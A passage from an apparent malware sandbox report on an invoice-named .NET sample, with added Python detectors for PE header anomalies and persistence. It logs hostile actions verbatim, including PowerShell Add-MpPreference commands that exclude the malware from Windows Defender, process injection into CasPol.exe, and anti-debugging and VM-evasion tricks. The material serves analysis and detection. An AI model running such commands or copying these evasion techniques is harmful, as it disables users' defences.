        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 8_2_0040B50D push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 9_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 9_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 9_2_0040B50D push ecx; ret
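        The two static PE findings above (a TimeDateStamp that decodes to 2043 and a stored CheckSum of 0x9f34 that does not match the image) are cheap to reproduce without a sandbox. The following Python is an added example, not code from the Joe Sandbox report: it reads the COFF and optional headers with struct, decodes the timestamp, recomputes the PE checksum the way ImageHlp's CheckSumMappedFile does (32-bit sum with end-around carry, the CheckSum field itself skipped, folded to 16 bits, plus file length), and emits both findings in the report's wording. It runs on a minimal PE built in memory that carries the report's two values; the report's expected checksum 0x37eb0 cannot be reproduced without the original file, so the test only checks that the recomputed value is self-consistent.

```python
import struct
from datetime import datetime, timezone

COFF_HEADER_SIZE = 20
OPT_CHECKSUM_OFFSET = 0x40   # CheckSum sits at +0x40 in both PE32 and PE32+ optional headers


def parse_pe_headers(data: bytes) -> dict:
    """Pull TimeDateStamp and CheckSum out of the COFF/optional headers (ValueError on non-PE input)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _symtab, _nsyms, _optsize, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + COFF_HEADER_SIZE
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%X" % magic)
    checksum_off = opt + OPT_CHECKSUM_OFFSET
    return {
        "machine": machine,
        "timestamp": timestamp,
        "checksum_offset": checksum_off,
        "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
        "computed_checksum": pe_checksum(data, checksum_off),
    }


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """PE checksum as ImageHlp CheckSumMappedFile computes it."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_off & ~3              # the CheckSum dword is excluded from its own sum
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def decode_timestamp(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_suspicious(ts: int, reference: datetime) -> bool:
    """A zeroed stamp is a deliberate wipe; a stamp later than the reference time cannot be a real link time."""
    return ts == 0 or decode_timestamp(ts) > reference


def set_checksum(data: bytes, checksum_off: int, value: int) -> bytes:
    """Rewrite the CheckSum field (used to show the recomputed value is self-consistent)."""
    return data[:checksum_off] + struct.pack("<I", value & 0xFFFFFFFF) + data[checksum_off + 4:]


def static_pe_findings(data: bytes, reference: datetime) -> list:
    """Emit the two anomalies in the same wording the sandbox uses."""
    hdr = parse_pe_headers(data)
    findings = []
    if timestamp_is_suspicious(hdr["timestamp"], reference):
        stamp = decode_timestamp(hdr["timestamp"]).strftime("%a %b %d %H:%M:%S %Y UTC") if hdr["timestamp"] else "zero"
        findings.append("suspicious time stamp: 0x%08X [%s]" % (hdr["timestamp"], stamp))
    if hdr["stored_checksum"] != hdr["computed_checksum"]:
        findings.append("real checksum: 0x%x should be: 0x%x" % (hdr["stored_checksum"], hdr["computed_checksum"]))
    return findings


def build_sample_pe(timestamp: int, stored_checksum: int) -> bytes:
    """Constructed minimal PE32 (headers only, padded to 512 bytes) carrying the report's two values."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, OPT_CHECKSUM_OFFSET, stored_checksum)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    return image + b"\0" * (512 - len(image))


if __name__ == "__main__":
    sample = build_sample_pe(0x8AB4D40F, 0x9F34)
    for finding in static_pe_findings(sample, datetime.now(timezone.utc)):
        print(finding)
```

Two caveats before treating either value as proof of tampering. Windows only enforces the CheckSum for kernel drivers and boot-time images, so user-mode malware rarely bothers to keep it correct, but neither do many legitimate packers and installers. And this sample is a .NET assembly: Roslyn's deterministic builds write a hash-derived value into TimeDateStamp, which routinely decodes to a far-future date, so a future stamp on a managed binary is a weaker signal than the same stamp on native code.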

        Persistence and Installation Behavior:

        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - File created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe - File created: C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - File created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - File created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe - File created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 8_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX (4 identical entries in the report)
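        The persistence chain above has three distinct detectable steps: a file named svchost.exe created under C:\Users\Public\Documents rather than a system directory, AdvancedRun.exe dropped into freshly generated GUID-named folders under %TEMP%, and a RunOnce value written under HKCU. The following Python is an added example, not part of the report: a small rule set over constructed file-create and registry-set events that reproduces those three findings and stays quiet on benign controls. The event shape is the minimum a Sysmon Event ID 11 (FileCreate) or 13 (RegistryEvent value set) record gives you. The report lists the RunOnce value name but not its data, so the svchost.exe path used as value data is an assumption, as is the partial list of system binary names.

```python
import ntpath
import re
from dataclasses import dataclass

# Windows binaries whose names malware borrows (partial list; an assumption for this example).
SYSTEM_BINARY_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                       "services.exe", "conhost.exe", "dllhost.exe", "rundll32.exe"}
# Where those names legitimately live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Locations any user can write to; an autorun entry should never point into them.
USER_WRITABLE_ROOTS = ("c:\\users\\public\\", "c:\\programdata\\")
USER_WRITABLE_PARTS = ("\\appdata\\local\\temp\\", "\\appdata\\local\\", "\\appdata\\roaming\\", "\\downloads\\")
AUTORUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once|onceex|services)?$", re.I)
GUID_TEMP_DIR = re.compile(r"\\temp\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)


@dataclass
class Event:
    kind: str           # "file_created" or "registry_set"
    process: str        # image path of the acting process
    path: str           # created file, or the registry key
    value: str = ""     # registry value name (registry events only)
    data: str = ""      # registry value data (registry events only)


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return p.startswith(USER_WRITABLE_ROOTS) or any(part in p for part in USER_WRITABLE_PARTS)


def exe_from_command(data: str) -> str:
    """First token of a Run/RunOnce command line, honouring a quoted image path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    return data.split(" ", 1)[0]


def rule_system_name_masquerade(ev: Event):
    """'Drops PE files with benign system names': a system binary name outside the system directories."""
    if ev.kind != "file_created":
        return None
    if ntpath.basename(ev.path).lower() in SYSTEM_BINARY_NAMES and not ev.path.lower().startswith(SYSTEM_DIRS):
        return "file named like a system binary created outside a system directory: %s (by %s)" % (ev.path, ev.process)
    return None


def rule_guid_temp_drop(ev: Event):
    """Executable dropped into a generated <GUID> folder under %TEMP%."""
    if ev.kind == "file_created" and ev.path.lower().endswith(".exe") and GUID_TEMP_DIR.search(ev.path):
        return "executable dropped into GUID-named Temp directory: %s (by %s)" % (ev.path, ev.process)
    return None


def rule_autorun_to_user_writable(ev: Event):
    """Run/RunOnce value whose command points at a user-writable location."""
    if ev.kind != "registry_set" or not AUTORUN_KEY.search(ev.path):
        return None
    exe = exe_from_command(ev.data)
    if in_user_writable(exe):
        return "autorun %s\\%s -> %s (user-writable path, set by %s)" % (ev.path, ev.value, exe, ev.process)
    return None


RULES = (rule_system_name_masquerade, rule_guid_temp_drop, rule_autorun_to_user_writable)


def persistence_findings(events) -> list:
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed telemetry: the first three events mirror the report, the rest are benign controls.
SAMPLE_EVENTS = (
    Event("file_created", r"C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe",
          r"C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"),
    Event("file_created", r"C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe",
          r"C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe"),
    Event("registry_set", r"C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe",
          r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
          "fIvxwJDVdGdMfCgtYuXwXFIxLX",            # value data below is assumed, not shown in the report
          r'"C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"'),
    Event("file_created", r"C:\Windows\servicing\TrustedInstaller.exe", r"C:\Windows\System32\svchost.exe"),
    Event("file_created", r"C:\Users\user\Downloads\setup.exe", r"C:\Users\user\AppData\Local\Temp\setup_tmp\helper.exe"),
    Event("registry_set", r"C:\Program Files\Vendor\setup.exe",
          r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
          "VendorAgent", r'"C:\Program Files\Vendor\agent.exe" /background'),
)


if __name__ == "__main__":
    for finding in persistence_findings(SAMPLE_EVENTS):
        print(finding)
```

The system-name rule is the one that deserves care in production: legitimate installers occasionally write files with these names, so pair it with the process context (here the creator is an unsigned executable on the desktop) rather than alerting on the name alone.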

        Hooking and other Techniques for Hiding and Protection:

        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to delay execution (extensive OutputDebugStringW loop)
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Section loaded: OutputDebugStringW count: 105
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4971
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2058
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1523
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 803
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 3816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 5533
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: foregroundWindowGot 407
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 4484 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460 Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1412 Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmp Binary or memory string: Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: WerFault.exe, 0000001E.00000003.418868252.0000000005276000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000018.00000002.315192830.0000000000BE5000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: WerFault.exe, 0000001E.00000002.447288923.00000000051F0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW2>a6
        Source: CasPol.exe, 00000019.00000003.323506513.0000000001081000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Process information queried: ProcessInformation

        Anti Debugging:

        Contains functionality to hide a thread from the debugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Code function: 0_2_08396890 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,00000000
        Hides threads from debuggers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Thread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Process queried: DebugPort
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe Code function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe Process token adjusted: Debug
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Network Connect: 104.21.71.230 80
        Adds a directory exclusion to Windows Defender
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
Injects a PE file into foreign processes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
Writes to foreign memory regions
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B30008
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
